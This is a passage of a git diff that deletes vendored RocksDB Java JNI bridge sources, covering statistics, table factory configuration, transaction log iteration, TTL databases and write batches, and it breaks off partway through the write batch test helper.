--- a/thirdparty/rocksdb/java/rocksjni/statisticsjni.cc
+++ /dev/null
@@ -1,33 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Statistics
-
-#include "rocksjni/statisticsjni.h"
-
-namespace rocksdb {
-
-  StatisticsJni::StatisticsJni(std::shared_ptr<Statistics> stats)
-      : StatisticsImpl(stats, false), m_ignore_histograms() {
-  }
-
-  StatisticsJni::StatisticsJni(std::shared_ptr<Statistics> stats,
-      const std::set<uint32_t> ignore_histograms) : StatisticsImpl(stats, false),
-      m_ignore_histograms(ignore_histograms) {
-  }
-
-  bool StatisticsJni::HistEnabledForType(uint32_t type) const {
-    if (type >= HISTOGRAM_ENUM_MAX) {
-      return false;
-    }
-    
-    if (m_ignore_histograms.count(type) > 0) {
-        return false;
-    }
-
-    return true;
-  }
-};
\ No newline at end of file
diff --git a/thirdparty/rocksdb/java/rocksjni/statisticsjni.h b/thirdparty/rocksdb/java/rocksjni/statisticsjni.h
deleted file mode 100644
index 600d9a6..0000000
--- a/thirdparty/rocksdb/java/rocksjni/statisticsjni.h
+++ /dev/null
@@ -1,33 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Statistics
-
-#ifndef JAVA_ROCKSJNI_STATISTICSJNI_H_
-#define JAVA_ROCKSJNI_STATISTICSJNI_H_
-
-#include <memory>
-#include <set>
-#include <string>
-#include "rocksdb/statistics.h"
-#include "monitoring/statistics.h"
-
-namespace rocksdb {
-
-  class StatisticsJni : public StatisticsImpl {
-   public:
-     StatisticsJni(std::shared_ptr<Statistics> stats);
-     StatisticsJni(std::shared_ptr<Statistics> stats,
-         const std::set<uint32_t> ignore_histograms);
-     virtual bool HistEnabledForType(uint32_t type) const override;
-
-   private:
-     const std::set<uint32_t> m_ignore_histograms;
- };
-
-}  // namespace rocksdb
-
-#endif  // JAVA_ROCKSJNI_STATISTICSJNI_H_
\ No newline at end of file
diff --git a/thirdparty/rocksdb/java/rocksjni/table.cc b/thirdparty/rocksdb/java/rocksjni/table.cc
deleted file mode 100644
index 5f0a473..0000000
--- a/thirdparty/rocksdb/java/rocksjni/table.cc
+++ /dev/null
@@ -1,92 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for rocksdb::Options.
-
-#include <jni.h>
-#include "include/org_rocksdb_PlainTableConfig.h"
-#include "include/org_rocksdb_BlockBasedTableConfig.h"
-#include "rocksdb/table.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/filter_policy.h"
-
-/*
- * Class:     org_rocksdb_PlainTableConfig
- * Method:    newTableFactoryHandle
- * Signature: (IIDIIBZZ)J
- */
-jlong Java_org_rocksdb_PlainTableConfig_newTableFactoryHandle(
-    JNIEnv* env, jobject jobj, jint jkey_size, jint jbloom_bits_per_key,
-    jdouble jhash_table_ratio, jint jindex_sparseness,
-    jint jhuge_page_tlb_size, jbyte jencoding_type,
-    jboolean jfull_scan_mode, jboolean jstore_index_in_file) {
-  rocksdb::PlainTableOptions options = rocksdb::PlainTableOptions();
-  options.user_key_len = jkey_size;
-  options.bloom_bits_per_key = jbloom_bits_per_key;
-  options.hash_table_ratio = jhash_table_ratio;
-  options.index_sparseness = jindex_sparseness;
-  options.huge_page_tlb_size = jhuge_page_tlb_size;
-  options.encoding_type = static_cast<rocksdb::EncodingType>(
-      jencoding_type);
-  options.full_scan_mode = jfull_scan_mode;
-  options.store_index_in_file = jstore_index_in_file;
-  return reinterpret_cast<jlong>(rocksdb::NewPlainTableFactory(options));
-}
-
-/*
- * Class:     org_rocksdb_BlockBasedTableConfig
- * Method:    newTableFactoryHandle
- * Signature: (ZJIJIIZIZZZJIBBI)J
- */
-jlong Java_org_rocksdb_BlockBasedTableConfig_newTableFactoryHandle(
-    JNIEnv* env, jobject jobj, jboolean no_block_cache, jlong block_cache_size,
-    jint block_cache_num_shardbits, jlong block_size, jint block_size_deviation,
-    jint block_restart_interval, jboolean whole_key_filtering,
-    jlong jfilterPolicy, jboolean cache_index_and_filter_blocks,
-    jboolean pin_l0_filter_and_index_blocks_in_cache,
-    jboolean hash_index_allow_collision, jlong block_cache_compressed_size,
-    jint block_cache_compressd_num_shard_bits, jbyte jchecksum_type,
-    jbyte jindex_type, jint jformat_version) {
-  rocksdb::BlockBasedTableOptions options;
-  options.no_block_cache = no_block_cache;
-
-  if (!no_block_cache && block_cache_size > 0) {
-    if (block_cache_num_shardbits > 0) {
-      options.block_cache =
-          rocksdb::NewLRUCache(block_cache_size, block_cache_num_shardbits);
-    } else {
-      options.block_cache = rocksdb::NewLRUCache(block_cache_size);
-    }
-  }
-  options.block_size = block_size;
-  options.block_size_deviation = block_size_deviation;
-  options.block_restart_interval = block_restart_interval;
-  options.whole_key_filtering = whole_key_filtering;
-  if (jfilterPolicy > 0) {
-    std::shared_ptr<rocksdb::FilterPolicy> *pFilterPolicy =
-        reinterpret_cast<std::shared_ptr<rocksdb::FilterPolicy> *>(
-            jfilterPolicy);
-    options.filter_policy = *pFilterPolicy;
-  }
-  options.cache_index_and_filter_blocks = cache_index_and_filter_blocks;
-  options.pin_l0_filter_and_index_blocks_in_cache =
-      pin_l0_filter_and_index_blocks_in_cache;
-  options.hash_index_allow_collision = hash_index_allow_collision;
-  if (block_cache_compressed_size > 0) {
-    if (block_cache_compressd_num_shard_bits > 0) {
-      options.block_cache =
-          rocksdb::NewLRUCache(block_cache_compressed_size,
-              block_cache_compressd_num_shard_bits);
-    } else {
-      options.block_cache = rocksdb::NewLRUCache(block_cache_compressed_size);
-    }
-  }
-  options.checksum = static_cast<rocksdb::ChecksumType>(jchecksum_type);
-  options.index_type = static_cast<
-      rocksdb::BlockBasedTableOptions::IndexType>(jindex_type);
-  options.format_version = jformat_version;
-
-  return reinterpret_cast<jlong>(rocksdb::NewBlockBasedTableFactory(options));
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/transaction_log.cc b/thirdparty/rocksdb/java/rocksjni/transaction_log.cc
deleted file mode 100644
index a5049e3..0000000
--- a/thirdparty/rocksdb/java/rocksjni/transaction_log.cc
+++ /dev/null
@@ -1,71 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Iterator methods from Java side.
-
-#include <jni.h>
-#include <stdio.h>
-#include <stdlib.h>
-
-#include "include/org_rocksdb_TransactionLogIterator.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_TransactionLogIterator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_TransactionLogIterator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  delete reinterpret_cast<rocksdb::TransactionLogIterator*>(handle);
-}
-
-/*
- * Class:     org_rocksdb_TransactionLogIterator
- * Method:    isValid
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_TransactionLogIterator_isValid(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<rocksdb::TransactionLogIterator*>(handle)->Valid();
-}
-
-/*
- * Class:     org_rocksdb_TransactionLogIterator
- * Method:    next
- * Signature: (J)V
- */
-void Java_org_rocksdb_TransactionLogIterator_next(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::TransactionLogIterator*>(handle)->Next();
-}
-
-/*
- * Class:     org_rocksdb_TransactionLogIterator
- * Method:    status
- * Signature: (J)V
- */
-void Java_org_rocksdb_TransactionLogIterator_status(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  rocksdb::Status s = reinterpret_cast<
-      rocksdb::TransactionLogIterator*>(handle)->status();
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_TransactionLogIterator
- * Method:    getBatch
- * Signature: (J)Lorg/rocksdb/TransactionLogIterator$BatchResult
- */
-jobject Java_org_rocksdb_TransactionLogIterator_getBatch(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  rocksdb::BatchResult batch_result =
-      reinterpret_cast<rocksdb::TransactionLogIterator*>(handle)->GetBatch();
-  return rocksdb::BatchResultJni::construct(env, batch_result);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/ttl.cc b/thirdparty/rocksdb/java/rocksjni/ttl.cc
deleted file mode 100644
index a66ad86..0000000
--- a/thirdparty/rocksdb/java/rocksjni/ttl.cc
+++ /dev/null
@@ -1,183 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::TtlDB methods.
-// from Java side.
-
-#include <jni.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string>
-#include <vector>
-#include <memory>
-
-#include "include/org_rocksdb_TtlDB.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_TtlDB
- * Method:    open
- * Signature: (JLjava/lang/String;IZ)J
- */
-jlong Java_org_rocksdb_TtlDB_open(JNIEnv* env,
-    jclass jcls, jlong joptions_handle, jstring jdb_path,
-    jint jttl, jboolean jread_only) {
-  const char* db_path = env->GetStringUTFChars(jdb_path, nullptr);
-  if(db_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(joptions_handle);
-  rocksdb::DBWithTTL* db = nullptr;
-  rocksdb::Status s = rocksdb::DBWithTTL::Open(*opt, db_path, &db,
-      jttl, jread_only);
-  env->ReleaseStringUTFChars(jdb_path, db_path);
-
-  // as TTLDB extends RocksDB on the java side, we can reuse
-  // the RocksDB portal here.
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(db);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return 0;
-  }
-}
-
-/*
- * Class:     org_rocksdb_TtlDB
- * Method:    openCF
- * Signature: (JLjava/lang/String;[[B[J[IZ)[J
- */
-jlongArray
-    Java_org_rocksdb_TtlDB_openCF(
-    JNIEnv* env, jclass jcls, jlong jopt_handle, jstring jdb_path,
-    jobjectArray jcolumn_names, jlongArray jcolumn_options,
-    jintArray jttls, jboolean jread_only) {
-  const char* db_path = env->GetStringUTFChars(jdb_path, nullptr);
-  if(db_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  const jsize len_cols = env->GetArrayLength(jcolumn_names);
-  jlong* jco = env->GetLongArrayElements(jcolumn_options, nullptr);
-  if(jco == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseStringUTFChars(jdb_path, db_path);
-    return nullptr;
-  }
-
-  std::vector<rocksdb::ColumnFamilyDescriptor> column_families;
-  jboolean has_exception = JNI_FALSE;
-  rocksdb::JniUtil::byteStrings<std::string>(
-    env,
-    jcolumn_names,
-    [](const char* str_data, const size_t str_len) {
-      return std::string(str_data, str_len);
-    },
-    [&jco, &column_families](size_t idx, std::string cf_name) {
-      rocksdb::ColumnFamilyOptions* cf_options =
-          reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jco[idx]);
-      column_families.push_back(
-          rocksdb::ColumnFamilyDescriptor(cf_name, *cf_options));
-    },
-    &has_exception);
-
-  env->ReleaseLongArrayElements(jcolumn_options, jco, JNI_ABORT);
-
-  if(has_exception == JNI_TRUE) {
-    // exception occurred
-    env->ReleaseStringUTFChars(jdb_path, db_path);
-    return nullptr;
-  }
-
-  std::vector<int32_t> ttl_values;
-  jint* jttlv = env->GetIntArrayElements(jttls, nullptr);
-  if(jttlv == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseStringUTFChars(jdb_path, db_path);
-    return nullptr;
-  }
-  const jsize len_ttls = env->GetArrayLength(jttls);
-  for(jsize i = 0; i < len_ttls; i++) {
-    ttl_values.push_back(jttlv[i]);
-  }
-  env->ReleaseIntArrayElements(jttls, jttlv, JNI_ABORT);
-
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jopt_handle);
-  std::vector<rocksdb::ColumnFamilyHandle*> handles;
-  rocksdb::DBWithTTL* db = nullptr;
-  rocksdb::Status s = rocksdb::DBWithTTL::Open(*opt, db_path, column_families,
-      &handles, &db, ttl_values, jread_only);
-
-  // we have now finished with db_path
-  env->ReleaseStringUTFChars(jdb_path, db_path);
-
-  // check if open operation was successful
-  if (s.ok()) {
-    const jsize resultsLen = 1 + len_cols; //db handle + column family handles
-    std::unique_ptr<jlong[]> results =
-        std::unique_ptr<jlong[]>(new jlong[resultsLen]);
-    results[0] = reinterpret_cast<jlong>(db);
-    for(int i = 1; i <= len_cols; i++) {
-      results[i] = reinterpret_cast<jlong>(handles[i - 1]);
-    }
-
-    jlongArray jresults = env->NewLongArray(resultsLen);
-    if(jresults == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    env->SetLongArrayRegion(jresults, 0, resultsLen, results.get());
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jresults);
-      return nullptr;
-    }
-
-    return jresults;
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return NULL;
-  }
-}
-
-/*
- * Class:     org_rocksdb_TtlDB
- * Method:    createColumnFamilyWithTtl
- * Signature: (JLorg/rocksdb/ColumnFamilyDescriptor;[BJI)J;
- */
-jlong Java_org_rocksdb_TtlDB_createColumnFamilyWithTtl(
-    JNIEnv* env, jobject jobj, jlong jdb_handle,
-    jbyteArray jcolumn_name, jlong jcolumn_options, jint jttl) {
-
-  jbyte* cfname = env->GetByteArrayElements(jcolumn_name, nullptr);
-  if(cfname == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-  const jsize len = env->GetArrayLength(jcolumn_name);
-
-  auto* cfOptions =
-      reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jcolumn_options);
-
-  auto* db_handle = reinterpret_cast<rocksdb::DBWithTTL*>(jdb_handle);
-  rocksdb::ColumnFamilyHandle* handle;
-  rocksdb::Status s = db_handle->CreateColumnFamilyWithTtl(
-      *cfOptions, std::string(reinterpret_cast<char *>(cfname),
-          len), &handle, jttl);
-
-  env->ReleaseByteArrayElements(jcolumn_name, cfname, 0);
-
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(handle);
-  }
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return 0;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/write_batch.cc b/thirdparty/rocksdb/java/rocksjni/write_batch.cc
deleted file mode 100644
index e84f6ed..0000000
--- a/thirdparty/rocksdb/java/rocksjni/write_batch.cc
+++ /dev/null
@@ -1,313 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::WriteBatch methods from Java side.
-#include <memory>
-
-#include "db/memtable.h"
-#include "db/write_batch_internal.h"
-#include "include/org_rocksdb_WriteBatch.h"
-#include "include/org_rocksdb_WriteBatch_Handler.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/status.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "rocksjni/portal.h"
-#include "rocksjni/writebatchhandlerjnicallback.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/logging.h"
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    newWriteBatch
- * Signature: (I)J
- */
-jlong Java_org_rocksdb_WriteBatch_newWriteBatch(
-    JNIEnv* env, jclass jcls, jint jreserved_bytes) {
-  auto* wb = new rocksdb::WriteBatch(static_cast<size_t>(jreserved_bytes));
-  return reinterpret_cast<jlong>(wb);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    count0
- * Signature: (J)I
- */
-jint Java_org_rocksdb_WriteBatch_count0(JNIEnv* env, jobject jobj,
-    jlong jwb_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  return static_cast<jint>(wb->Count());
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    clear0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatch_clear0(JNIEnv* env, jobject jobj,
-    jlong jwb_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  wb->Clear();
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    setSavePoint0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatch_setSavePoint0(
-    JNIEnv* env, jobject jobj, jlong jwb_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  wb->SetSavePoint();
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    rollbackToSavePoint0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatch_rollbackToSavePoint0(
-    JNIEnv* env, jobject jobj, jlong jwb_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  auto s = wb->RollbackToSavePoint();
-
-  if (s.ok()) {
-    return;
-  }
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    put
- * Signature: (J[BI[BI)V
- */
-void Java_org_rocksdb_WriteBatch_put__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len,
-    jbyteArray jentry_value, jint jentry_value_len) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto put = [&wb] (rocksdb::Slice key, rocksdb::Slice value) {
-    wb->Put(key, value);
-  };
-  rocksdb::JniUtil::kv_op(put, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    put
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatch_put__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len,
-    jbyteArray jentry_value, jint jentry_value_len, jlong jcf_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto put = [&wb, &cf_handle] (rocksdb::Slice key, rocksdb::Slice value) {
-    wb->Put(cf_handle, key, value);
-  };
-  rocksdb::JniUtil::kv_op(put, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    merge
- * Signature: (J[BI[BI)V
- */
-void Java_org_rocksdb_WriteBatch_merge__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len,
-    jbyteArray jentry_value, jint jentry_value_len) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto merge = [&wb] (rocksdb::Slice key, rocksdb::Slice value) {
-    wb->Merge(key, value);
-  };
-  rocksdb::JniUtil::kv_op(merge, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    merge
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatch_merge__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len,
-    jbyteArray jentry_value, jint jentry_value_len, jlong jcf_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto merge = [&wb, &cf_handle] (rocksdb::Slice key, rocksdb::Slice value) {
-    wb->Merge(cf_handle, key, value);
-  };
-  rocksdb::JniUtil::kv_op(merge, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    remove
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_WriteBatch_remove__J_3BI(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto remove = [&wb] (rocksdb::Slice key) {
-    wb->Delete(key);
-  };
-  rocksdb::JniUtil::k_op(remove, env, jobj, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    remove
- * Signature: (J[BIJ)V
- */
-void Java_org_rocksdb_WriteBatch_remove__J_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len, jlong jcf_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto remove = [&wb, &cf_handle] (rocksdb::Slice key) {
-    wb->Delete(cf_handle, key);
-  };
-  rocksdb::JniUtil::k_op(remove, env, jobj, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    deleteRange
- * Signature: (J[BI[BI)V
- */
-JNIEXPORT void JNICALL Java_org_rocksdb_WriteBatch_deleteRange__J_3BI_3BI(
-    JNIEnv*, jobject, jlong, jbyteArray, jint, jbyteArray, jint);
-
-void Java_org_rocksdb_WriteBatch_deleteRange__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwb_handle, jbyteArray jbegin_key,
-    jint jbegin_key_len, jbyteArray jend_key, jint jend_key_len) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto deleteRange = [&wb](rocksdb::Slice beginKey, rocksdb::Slice endKey) {
-    wb->DeleteRange(beginKey, endKey);
-  };
-  rocksdb::JniUtil::kv_op(deleteRange, env, jobj, jbegin_key, jbegin_key_len,
-                          jend_key, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    deleteRange
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatch_deleteRange__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwb_handle, jbyteArray jbegin_key,
-    jint jbegin_key_len, jbyteArray jend_key, jint jend_key_len,
-    jlong jcf_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto deleteRange = [&wb, &cf_handle](rocksdb::Slice beginKey,
-                                       rocksdb::Slice endKey) {
-    wb->DeleteRange(cf_handle, beginKey, endKey);
-  };
-  rocksdb::JniUtil::kv_op(deleteRange, env, jobj, jbegin_key, jbegin_key_len,
-                          jend_key, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    putLogData
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_WriteBatch_putLogData(
-    JNIEnv* env, jobject jobj, jlong jwb_handle, jbyteArray jblob,
-    jint jblob_len) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto putLogData = [&wb] (rocksdb::Slice blob) {
-    wb->PutLogData(blob);
-  };
-  rocksdb::JniUtil::k_op(putLogData, env, jobj, jblob, jblob_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    iterate
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_WriteBatch_iterate(
-    JNIEnv* env , jobject jobj, jlong jwb_handle, jlong handlerHandle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  rocksdb::Status s = wb->Iterate(
-    reinterpret_cast<rocksdb::WriteBatchHandlerJniCallback*>(handlerHandle));
-
-  if (s.ok()) {
-    return;
-  }
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatch_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(handle);
-  assert(wb != nullptr);
-  delete wb;
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch_Handler
- * Method:    createNewHandler0
- * Signature: ()J
- */
-jlong Java_org_rocksdb_WriteBatch_00024Handler_createNewHandler0(
-    JNIEnv* env, jobject jobj) {
-  auto* wbjnic = new rocksdb::WriteBatchHandlerJniCallback(env, jobj);
-  return reinterpret_cast<jlong>(wbjnic);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch_Handler
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatch_00024Handler_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* wbjnic =
-      reinterpret_cast<rocksdb::WriteBatchHandlerJniCallback*>(handle);
-  assert(wbjnic != nullptr);
-  delete wbjnic;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/write_batch_test.cc b/thirdparty/rocksdb/java/rocksjni/write_batch_test.cc
deleted file mode 100644
index 199ad23..0000000
--- a/thirdparty/rocksdb/java/rocksjni/write_batch_test.cc
+++ /dev/null
@@ -1,161 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::WriteBatch methods testing from Java side.
-#include <memory>
-
-#include "db/memtable.h"
-#include "db/write_batch_internal.h"
-#include "include/org_rocksdb_WriteBatch.h"
-#include "include/org_rocksdb_WriteBatchTest.h"
-#include "include/org_rocksdb_WriteBatchTestInternalHelper.h"
-#include "include/org_rocksdb_WriteBatch_Handler.h"
-#include "options/cf_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/status.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "rocksjni/portal.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-
-/*
- * Class:     org_rocksdb_WriteBatchTest
- * Method:    getContents
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_WriteBatchTest_getContents(
-    JNIEnv* env, jclass jclazz, jlong jwb_handle) {
-  auto* b = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(b != nullptr);
-
-  // todo: Currently the following code is directly copied from
-  // db/write_bench_test.cc.  It could be implemented in java once
-  // all the necessary components can be accessed via jni api.
-
-  rocksdb::InternalKeyComparator cmp(rocksdb::BytewiseComparator());
-  auto factory = std::make_shared<rocksdb::SkipListFactory>();
-  rocksdb::Options options;
-  rocksdb::WriteBufferManager wb(options.db_write_buffer_size);
-  options.memtable_factory = factory;
-  rocksdb::MemTable* mem = new rocksdb::MemTable(
-      cmp, rocksdb::ImmutableCFOptions(options),
-      rocksdb::MutableCFOptions(options), &wb, rocksdb::kMaxSequenceNumber,
-      0 /* column_family_id */);
-  mem->Ref();
-  std::string state;
-  rocksdb::ColumnFamilyMemTablesDefault cf_mems_default(mem);
-  rocksdb::Status s =
-      rocksdb::WriteBatchInternal::InsertInto(b, &cf_mems_default, nullptr);
-  int count = 0;
-  rocksdb::Arena arena;
-  rocksdb::ScopedArenaIterator iter(mem->NewIterator(
-      rocksdb::ReadOptions(), &arena));
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    rocksdb::ParsedInternalKey ikey;
-    ikey.clear();
-    bool parsed = rocksdb::ParseInternalKey(iter->key(), &ikey);
-    if (!parsed) {
-      assert(parsed);
-    }
-    switch (ikey.type) {
-      case rocksdb::kTypeValue:
-        state.append("Put(");
-        state.append(ikey.user_key.ToString());
-        state.append(", ");
